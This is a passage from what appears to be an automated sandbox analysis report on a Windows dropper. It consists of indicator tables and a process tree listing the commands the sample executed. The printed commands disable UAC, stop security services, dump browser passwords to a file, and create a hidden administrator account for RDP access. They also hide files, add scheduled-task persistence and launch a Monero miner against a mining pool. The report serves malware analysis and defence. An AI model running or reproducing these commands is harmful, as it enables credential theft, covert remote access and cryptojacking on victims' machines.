4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
4808	rutserv.exe
4808	rutserv.exe
4808	rutserv.exe
4808	rutserv.exe
4808	rutserv.exe
4808	rutserv.exe
908	rutserv.exe
908	rutserv.exe
2068	powershell.exe
2068	powershell.exe
2068	powershell.exe
3260	rutserv.exe
3260	rutserv.exe
1540	rutserv.exe
1540	rutserv.exe
1540	rutserv.exe
1540	rutserv.exe
1540	rutserv.exe
1540	rutserv.exe
1284	rfusclient.exe
1284	rfusclient.exe
1612	winit.exe
1612	winit.exe
1612	winit.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4816	taskhostw.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
4848	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	4808	rutserv.exe
Token: SeDebugPrivilege	4708	taskkill.exe
Token: SeDebugPrivilege	4812	taskkill.exe
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeDebugPrivilege	3260	rutserv.exe
Token: SeTakeOwnershipPrivilege	1540	rutserv.exe
Token: SeTcbPrivilege	1540	rutserv.exe
Token: SeTcbPrivilege	1540	rutserv.exe
Token: SeDebugPrivilege	4260	taskkill.exe
Token: SeTakeOwnershipPrivilege	4092	takeown.exe
Token: SeRestorePrivilege	4844	icacls.exe
Token: SeAuditPrivilege	2028	svchost.exe
Token: SeDebugPrivilege	3964	taskkill.exe
Token: SeDebugPrivilege	4844	taskkill.exe
Token: SeDebugPrivilege	3800	RDPWInst.exe
Token: SeAuditPrivilege	4652	svchost.exe
Token: SeLockMemoryPrivilege	1984	AppHost.exe
Token: SeLockMemoryPrivilege	1984	AppHost.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
1612	winit.exe
3164	svchost.exe
936	P.exe
2864	P.exe
2412	R8.exe
4808	rutserv.exe
908	rutserv.exe
2608	winlogon.exe
3260	rutserv.exe
1540	rutserv.exe
1948	Vega.exe
4064	MOS.exe
2424	Vegas.exe
2980	M.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4396 wrote to memory of 1768	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	85
PID 4396 wrote to memory of 1768	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	85
PID 4396 wrote to memory of 1768	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	85
PID 4396 wrote to memory of 3160	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	86
PID 4396 wrote to memory of 3160	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	86
PID 4396 wrote to memory of 3160	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	86
PID 1768 wrote to memory of 4052	1768	Logs.exe	87
PID 1768 wrote to memory of 4052	1768	Logs.exe	87
PID 1768 wrote to memory of 4052	1768	Logs.exe	87
PID 4396 wrote to memory of 3180	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	90
PID 4396 wrote to memory of 3180	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	90
PID 4396 wrote to memory of 3180	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	90
PID 4396 wrote to memory of 3912	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	91
PID 4396 wrote to memory of 3912	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	91
PID 4396 wrote to memory of 3912	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	91
PID 4052 wrote to memory of 1452	4052	cmd.exe	93
PID 4052 wrote to memory of 1452	4052	cmd.exe	93
PID 4052 wrote to memory of 1452	4052	cmd.exe	93
PID 4396 wrote to memory of 3780	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	94
PID 4396 wrote to memory of 3780	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	94
PID 4396 wrote to memory of 3780	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	94
PID 3160 wrote to memory of 4620	3160	winit.exe	96
PID 3160 wrote to memory of 4620	3160	winit.exe	96
PID 3160 wrote to memory of 4620	3160	winit.exe	96
PID 3160 wrote to memory of 1612	3160	winit.exe	97
PID 3160 wrote to memory of 1612	3160	winit.exe	97
PID 3160 wrote to memory of 1612	3160	winit.exe	97
PID 3912 wrote to memory of 4684	3912	cmd.exe	99
PID 3912 wrote to memory of 4684	3912	cmd.exe	99
PID 3912 wrote to memory of 4684	3912	cmd.exe	99
PID 4396 wrote to memory of 5084	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	98
PID 4396 wrote to memory of 5084	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	98
PID 4396 wrote to memory of 5084	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	98
PID 3780 wrote to memory of 2852	3780	cmd.exe	100
PID 3780 wrote to memory of 2852	3780	cmd.exe	100
PID 3780 wrote to memory of 2852	3780	cmd.exe	100
PID 4396 wrote to memory of 4944	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	102
PID 4396 wrote to memory of 4944	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	102
PID 4396 wrote to memory of 4944	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	102
PID 5084 wrote to memory of 3088	5084	cmd.exe	104
PID 5084 wrote to memory of 3088	5084	cmd.exe	104
PID 5084 wrote to memory of 3088	5084	cmd.exe	104
PID 4396 wrote to memory of 5040	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	105
PID 4396 wrote to memory of 5040	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	105
PID 4396 wrote to memory of 5040	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	105
PID 3180 wrote to memory of 3164	3180	Cheat.exe	107
PID 3180 wrote to memory of 3164	3180	Cheat.exe	107
PID 3180 wrote to memory of 3164	3180	Cheat.exe	107
PID 4620 wrote to memory of 5072	4620	WScript.exe	108
PID 4620 wrote to memory of 5072	4620	WScript.exe	108
PID 4620 wrote to memory of 5072	4620	WScript.exe	108
PID 3164 wrote to memory of 936	3164	svchost.exe	110
PID 3164 wrote to memory of 936	3164	svchost.exe	110
PID 3164 wrote to memory of 936	3164	svchost.exe	110
PID 4396 wrote to memory of 2324	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	111
PID 4396 wrote to memory of 2324	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	111
PID 4396 wrote to memory of 2324	4396	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe	111
PID 4944 wrote to memory of 4948	4944	cmd.exe	171
PID 4944 wrote to memory of 4948	4944	cmd.exe	171
PID 4944 wrote to memory of 4948	4944	cmd.exe	171
PID 5040 wrote to memory of 876	5040	cmd.exe	114
PID 5040 wrote to memory of 876	5040	cmd.exe	114
PID 5040 wrote to memory of 876	5040	cmd.exe	114
PID 2324 wrote to memory of 680	2324	cmd.exe	116

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1696	attrib.exe
968	attrib.exe
4628	attrib.exe
1872	attrib.exe
2556	attrib.exe
3932	attrib.exe
4672	attrib.exe

C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Checks whether UAC is enabled
- Modifies WinLogon
- Drops file in System32 directory
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4396
- C:\ProgramData\Microsoft\Intel\Logs.exe
  C:\ProgramData\Microsoft\Intel\Logs.exe -pnaxui
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Programdata\Microsoft\Intel\L.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4052
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1452
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1544
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4912
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:856
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4428
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4336
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3520
- C:\ProgramData\Microsoft\Intel\winit.exe
  C:\ProgramData\Microsoft\Intel\winit.exe -pnaxui
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3160
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Programdata\Windows\install.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4620
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      PID:5072
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "regedit.reg"
        5⤵
        UAC bypass
        Windows security bypass
        Hide Artifacts: Hidden Users
        Runs .reg file with regedit
        
        PID:2076
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:4572
    - - C:\Programdata\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4808
    - - C:\Programdata\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:908
    - - C:\Programdata\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3260
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:1696
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:4672
- - C:\Programdata\Windows\winit.exe
    "C:\Programdata\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:1612
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
      4⤵
      PID:4072
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:368
- C:\ProgramData\Microsoft\Intel\Cheat.exe
  C:\ProgramData\Microsoft\Intel\Cheat.exe -pnaxui
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3180
- - C:\programdata\microsoft\intel\svchost.exe
    "C:\programdata\microsoft\intel\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3164
  - - C:\programdata\microsoft\intel\P.exe
      C:\programdata\microsoft\intel\P.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:936
    - - C:\programdata\microsoft\rootsystem\P.exe
        
        "C:\programdata\microsoft\rootsystem\P.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2864
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\rootsystem\P.vbs"
        5⤵
        Checks computer location settings
        
        PID:3708
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
        6⤵
        
        PID:1536
        
        C:\programdata\microsoft\rootsystem\1.exe
        
        C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2980
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:2412
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        Checks computer location settings
        
        PID:4944
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3240
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4708
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4812
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:116
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:1580
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        Executes dropped EXE
        
        PID:1396
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4260
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:4948
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        7⤵
        Checks computer location settings
        
        PID:3012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        8⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:4436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        9⤵
        
        PID:208
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4848
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        9⤵
        
        PID:2708
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        10⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:4276
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        9⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        10⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        9⤵
        
        PID:4368
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:4572
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        9⤵
        
        PID:3440
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:880
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" "John" /add
        9⤵
        
        PID:1128
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" "John" /add
        10⤵
        
        PID:968
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        9⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        10⤵
        
        PID:2968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        9⤵
        Hide Artifacts: Hidden Users
        
        PID:756
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        9⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:3800
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3932
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        9⤵
        Executes dropped EXE
        
        PID:1524
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        9⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4628
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        9⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1872
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2556
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\users\john"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3932
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:1532
  - - C:\ProgramData\Microsoft\Intel\winlog.exe
      C:\ProgramData\Microsoft\Intel\winlog.exe -p123
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:2352
    - - C:\programdata\microsoft\intel\winlogon.exe
        
        "C:\programdata\microsoft\intel\winlogon.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2608
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7CB2.tmp\7CB3.bat C:\programdata\microsoft\intel\winlogon.exe"
        6⤵
        
        PID:3944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        7⤵
        Drops file in System32 directory
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2068
  - - C:\ProgramData\Microsoft\Intel\Vega.exe
      C:\ProgramData\Microsoft\Intel\Vega.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1948
    - - C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe
        
        C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe -p123
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2324
      - C:\programdata\microsoft\intel\Vegas.exe
        
        "C:\programdata\microsoft\intel\Vegas.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2424
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A1BE.tmp\A1BF.bat C:\programdata\microsoft\intel\Vegas.exe"
        7⤵
        
        PID:4784
        
        C:\Windows\system32\takeown.exe
        
        takeown /f c:\windows\system32\systemreset.exe
        8⤵
        Possible privilege escalation attempt
        Suspicious use of AdjustPrivilegeToken
        
        PID:4092
        
        C:\Windows\system32\icacls.exe
        
        icacls c:\windows\system32\systemreset.exe /setowner Admin
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:4844
        
        C:\Windows\system32\icacls.exe
        
        icacls "c:\windows\system32\systemreset.exe" /grant:r Admin:F
        8⤵
        Possible privilege escalation attempt
        
        PID:2328
  - - C:\programdata\microsoft\intel\MOS.exe
      C:\programdata\microsoft\intel\MOS.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:4064
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2980
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\R.vbs"
        5⤵
        Checks computer location settings
        
        PID:1668
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\Microsoft\Intel\OS.bat" "
        6⤵
        
        PID:1908
        
        \??\c:\Programdata\Microsoft\Intel\Cheat64.exe
        
        "c:\Programdata\Microsoft\Intel\Cheat64.exe" /qn
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4188
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4360
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3852
        
        C:\ProgramData\RealtekHD\taskhostw.exe
        
        C:\ProgramData\RealtekHD\taskhostw.exe
        8⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:4816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        9⤵
        
        PID:3268
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        10⤵
        Gathers network information
        
        PID:832
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        9⤵
        
        PID:3728
        
        C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        10⤵
        
        PID:3128
        
        C:\ProgramData\WindowsTask\AppHost.exe
        
        C:\ProgramData\WindowsTask\AppHost.exe -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] --donate-level=1 -p x -t4
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1984
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      Drops file in Drivers directory
      PID:3408
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      PID:3776
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:4120
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:2680
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4844
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3912
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    - Launches sc.exe
    PID:4684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3780
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    - Launches sc.exe
    PID:2852
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5084
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    - Launches sc.exe
    PID:3088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4944
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    - Launches sc.exe
    PID:4948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop swprv
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5040
- - C:\Windows\SysWOW64\sc.exe
    sc stop swprv
    3⤵
    - Launches sc.exe
    PID:876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config swprv start= disabled
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Windows\SysWOW64\sc.exe
    sc config swprv start= disabled
    3⤵
    - Launches sc.exe
    PID:680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    - Launches sc.exe
    PID:4644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:4300
- - C:\Windows\SysWOW64\sc.exe
    sc stop bytefenceservice
    3⤵
